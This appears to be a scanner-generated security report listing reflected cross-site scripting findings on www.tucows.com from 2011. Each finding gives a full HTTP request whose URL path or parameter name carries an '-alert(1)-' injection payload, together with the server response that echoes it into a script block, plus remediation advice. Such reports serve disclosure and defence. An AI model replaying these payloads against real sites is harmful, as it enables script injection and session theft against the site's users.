Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesdc3ab"-alert(1)-"412e4b918b2/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16ea9"-alert(1)-"fa1a0931a13 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes16ea9"-alert(1)-"fa1a0931a13/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5393"-alert(1)-"cb3cdfe4732 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeanyd5393"-alert(1)-"cb3cdfe4732/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aa0e"-alert(1)-"a1b4df2075b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/styles.css6aa0e"-alert(1)-"a1b4df2075b HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:56 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acf37"-alert(1)-"829dd6d7186 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/styles.css?acf37"-alert(1)-"829dd6d7186=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:55 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f522"-alert(1)-"246c1c75e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images7f522"-alert(1)-"246c1c75e2/newassets/javascript:void(null) HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:34 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c15"-alert(1)-"6e3e5a56f01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsc3c15"-alert(1)-"6e3e5a56f01/javascript:void(null) HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:54 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1045a"-alert(1)-"0b7ffb9ae62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/javascript:void(null)1045a"-alert(1)-"0b7ffb9ae62 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:09 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.315. http://www.tucows.com/images/newassets/javascript:void(null) [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/javascript:void(null)
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e7b"-alert(1)-"e4c6b9e0aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/javascript:void(null)?55e7b"-alert(1)-"e4c6b9e0aae=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:01 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8030"-alert(1)-"d2a10cd4b2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesb8030"-alert(1)-"d2a10cd4b2f/newassets/lostpass.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2408f"-alert(1)-"745fc17afdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets2408f"-alert(1)-"745fc17afdb/lostpass.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:54 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f369"-alert(1)-"1c6dab942a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/lostpass.html3f369"-alert(1)-"1c6dab942a HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.319. http://www.tucows.com/images/newassets/lostpass.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/lostpass.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10cdc"-alert(1)-"bef9c960c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/lostpass.html?10cdc"-alert(1)-"bef9c960c47=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
